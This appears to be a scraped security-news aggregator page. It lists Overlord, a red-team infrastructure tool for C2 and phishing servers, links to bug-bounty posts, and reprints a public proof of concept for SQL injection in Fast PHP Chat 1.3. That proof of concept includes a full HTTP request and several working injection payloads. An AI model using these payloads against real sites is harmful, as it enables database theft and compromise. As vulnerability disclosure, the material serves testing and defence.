Hacking Articles Tips Tricks Videos Tutorials
Photo
KitPloit - PenTest Tools!
Overlord - Overlord - Red Teaming Infrastructure Automation
https://1.bp.blogspot.com/-NqAgYSYhU40/YH5f1iur-4I/AAAAAAAAV58/-W4ZMaq10sk6QvP-x7iq83TxdsFeNEa1QCNcBGAsYHQ/w640-h561/logo.png
Overlord provides a python-based console CLI which is used to build Red Teaming infrastructure in an automated way. The user has to provide inputs by using the tool’s modules (e.g. C2, Email Server, HTTP web delivery server, Phishing server etc.) and the full infra / modules and scripts will be generated automatically on a cloud provider of choice. Currently supports AWS and Digital Ocean. The tool is still under development and it was inspired and uses the Red-Baron Terraform implementation found on Github.
A demo infrastructure was set up in our blog post https://blog.qsecure.com.cy/posts/overlord/.
For the full documentation of the tool visit the Wiki tab at https://github.com/qsecure-labs/overlord/wiki.
Installation
Acknowledgments
This project could not be created without the awsome work for Marcello Salvati @byt3bl33d3r with the RedBaron Project. That is the reason why we are referencing the name of RedBaron on our project as well.
As Marcello stated on his acknowledgments, further thanks to:
1. @_RastaMouse's two serie's blogpost on 'Automated Red Team Infrastructure Deployment with Terraform' Part 1 and 2
2. @bluscreenofjeff's with his amazing Wiki on Read Team Infrastucture
3. @spotheplanet's blog post on Red team infrastructure
Disclaimer
Overlord comes without warranty and is meant to be used by penetration testers during approved red teaming assessments and/or social enigneering assessments. Overlord's developers and QSecure decline all responsibility in case the tool is used for malicious purposes or in any illegal context.
Download Overlord
Overlord - Overlord - Red Teaming Infrastructure Automation
https://1.bp.blogspot.com/-NqAgYSYhU40/YH5f1iur-4I/AAAAAAAAV58/-W4ZMaq10sk6QvP-x7iq83TxdsFeNEa1QCNcBGAsYHQ/w640-h561/logo.png
Overlord provides a python-based console CLI which is used to build Red Teaming infrastructure in an automated way. The user has to provide inputs by using the tool’s modules (e.g. C2, Email Server, HTTP web delivery server, Phishing server etc.) and the full infra / modules and scripts will be generated automatically on a cloud provider of choice. Currently supports AWS and Digital Ocean. The tool is still under development and it was inspired and uses the Red-Baron Terraform implementation found on Github.
A demo infrastructure was set up in our blog post https://blog.qsecure.com.cy/posts/overlord/.
For the full documentation of the tool visit the Wiki tab at https://github.com/qsecure-labs/overlord/wiki.
Installation
git clone https://github.com/qsecure-labs/overlord.git
cd overlord/config
chmod +x install.sh
sudo ./install.shAcknowledgments
This project could not be created without the awsome work for Marcello Salvati @byt3bl33d3r with the RedBaron Project. That is the reason why we are referencing the name of RedBaron on our project as well.
As Marcello stated on his acknowledgments, further thanks to:
1. @_RastaMouse's two serie's blogpost on 'Automated Red Team Infrastructure Deployment with Terraform' Part 1 and 2
2. @bluscreenofjeff's with his amazing Wiki on Read Team Infrastucture
3. @spotheplanet's blog post on Red team infrastructure
Disclaimer
Overlord comes without warranty and is meant to be used by penetration testers during approved red teaming assessments and/or social enigneering assessments. Overlord's developers and QSecure decline all responsibility in case the tool is used for malicious purposes or in any illegal context.
Download Overlord
Hacking GraphQL for Fun and Profit — Part 1 — Understanding GraphQL Basics
Hello everyone!!Continue reading on Medium »
Read more...
Hello everyone!!Continue reading on Medium »
Read more...
DeFi Saver bug bounty is now live on Immunefi
The new DeFi Saver bug bounty is now live on Immunefi! Immunefi is a bug bounty platform for smart contracts and DeFi projects, where…Continue reading on DeFi Saver »
Read more...
The new DeFi Saver bug bounty is now live on Immunefi! Immunefi is a bug bounty platform for smart contracts and DeFi projects, where…Continue reading on DeFi Saver »
Read more...
Deep Web
Social networks
Hello.
Anyone know of any social networks? I remember blackbook a few years back. I haven't used tor and the deepweb in a while.
submitted by /u/ImTomThorne
[link] [comments]
Social networks
Hello.
Anyone know of any social networks? I remember blackbook a few years back. I haven't used tor and the deepweb in a while.
submitted by /u/ImTomThorne
[link] [comments]
reddit
Social networks
Hello. Anyone know of any social networks? I remember blackbook a few years back. I haven't used tor and the deepweb in a while.
CVE 2020-14178 Story [Bounty 500$ for 3 Vulnerabilities]
https://vaibhavgaikwad1712.medium.com/cve-2020-14178-story-bounty-500-for-3-vulnerabilities-587cd950eb38?source=rss------bug_bounty-5
Hi There !!!Continue reading on Medium » (https://vaibhavgaikwad1712.medium.com/cve-2020-14178-story-bounty-500-for-3-vulnerabilities-587cd950eb38?source=rss------bug_bounty-5)
https://vaibhavgaikwad1712.medium.com/cve-2020-14178-story-bounty-500-for-3-vulnerabilities-587cd950eb38?source=rss------bug_bounty-5
Hi There !!!Continue reading on Medium » (https://vaibhavgaikwad1712.medium.com/cve-2020-14178-story-bounty-500-for-3-vulnerabilities-587cd950eb38?source=rss------bug_bounty-5)
Hacking GraphQL for Fun and Profit — Part 1 — Understanding GraphQL Basics
https://busk3r.medium.com/hacking-graphql-for-fun-and-profit-part-1-understanding-graphql-basics-72bb3dd22efa?source=rss------bug_bounty-5
https://busk3r.medium.com/hacking-graphql-for-fun-and-profit-part-1-understanding-graphql-basics-72bb3dd22efa?source=rss------bug_bounty-5
Hello everyone!!Continue reading on Medium » (https://busk3r.medium.com/hacking-graphql-for-fun-and-profit-part-1-understanding-graphql-basics-72bb3dd22efa?source=rss------bug_bounty-5)
DeFi Saver bug bounty is now live on Immunefi
https://medium.com/defi-saver/defi-saver-bug-bounty-is-now-live-on-immunefi-56af32d0c220?source=rss------bug_bounty-5
https://medium.com/defi-saver/defi-saver-bug-bounty-is-now-live-on-immunefi-56af32d0c220?source=rss------bug_bounty-5
The new DeFi Saver bug bounty is now live on Immunefi! Immunefi is a bug bounty platform for smart contracts and DeFi projects, where…Continue reading on DeFi Saver » (https://medium.com/defi-saver/defi-saver-bug-bounty-is-now-live-on-immunefi-56af32d0c220?source=rss------bug_bounty-5)
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Fast PHP Chat 1.3 SQL Injection
https://1.bp.blogspot.com/-3PgjWVftdQ0/WWlvP-R2mXI/AAAAAAAAIM8/iBQyafDa-iYc-AHcRZlLffBv9_pWsP_-gCLcBGAs/s1600/h30.png
Fast PHP Chat version 1.3 suffers from a remote SQL injection vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
Fast PHP Chat 1.3 SQL Injection
https://1.bp.blogspot.com/-3PgjWVftdQ0/WWlvP-R2mXI/AAAAAAAAIM8/iBQyafDa-iYc-AHcRZlLffBv9_pWsP_-gCLcBGAs/s1600/h30.png
Fast PHP Chat version 1.3 suffers from a remote SQL injection vulnerability.
MD5 |
a327483a86ab5acaf1b709b62d3c730dDownload
# Exploit Title: Fast PHP Chat 1.3 - 'my_item_search' SQL Injection
# Date: 15/04/2021
# Exploit Author: Fatih Coskun
# Vendor Homepage: https://codecanyon.net/item/fast-php-chat-responsive-live-ajax-chat/10721076
# Version: 1.3
# Category: Webapps
# Tested on: Kali linux
# Description : The vulnerability allows an attacker to inject sql commands from search section with 'my_item_search' parameter.
====================================================
# PoC : SQLi :
POST /chat/edit.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://localhost/chat/edit.php
Cookie: PHPSESSID=9a04fe702b8ff82c1199590d7c286e1c;
_ga=GA1.2.1275939122.1527132107; _gid=GA1.2.1709883568.1527132107
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
my_item_search=test&submit_search=Search
Parameter : my_item_search
Type : boolean-based blind
Demo : https://localhost/chat/edit.php
Payload : my_item_search=-2454' OR 6122=6122#&submit=Search
Type : error-based
Demo : https://localhost/chat/edit.php
Payload : my_item_search=test' AND (SELECT 3274 FROM(SELECT
COUNT(*),CONCAT(0x71706a7071,(SELECT
(ELT(3274=3274,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- hbeW&submit=Search
Type : stacked queries
Demo : https://localhost/chat/edit.php
Payload : my_item_search=test';SELECT SLEEP(5)#&submit=Search
Type : AND/OR time-based blind
Demo : https://localhost/login-script-demo/users.php
Payload : my_item_search=test' OR SLEEP(5)-- mlod&submit=Search
Type : UNION query
Demo : https://localhost/chat/edit.php
Payload : my_item_search=test' UNION ALL SELECT
NULL,CONCAT(0x71706a7071,0x4c5a6241667667676e4f6658775348795675704b557871675a5542646273574e5359776668534a71,0x7162716b71),NULL,NULL,NULL,NULL#&submit=Search
====================================================
Source:packetstormsecurity.com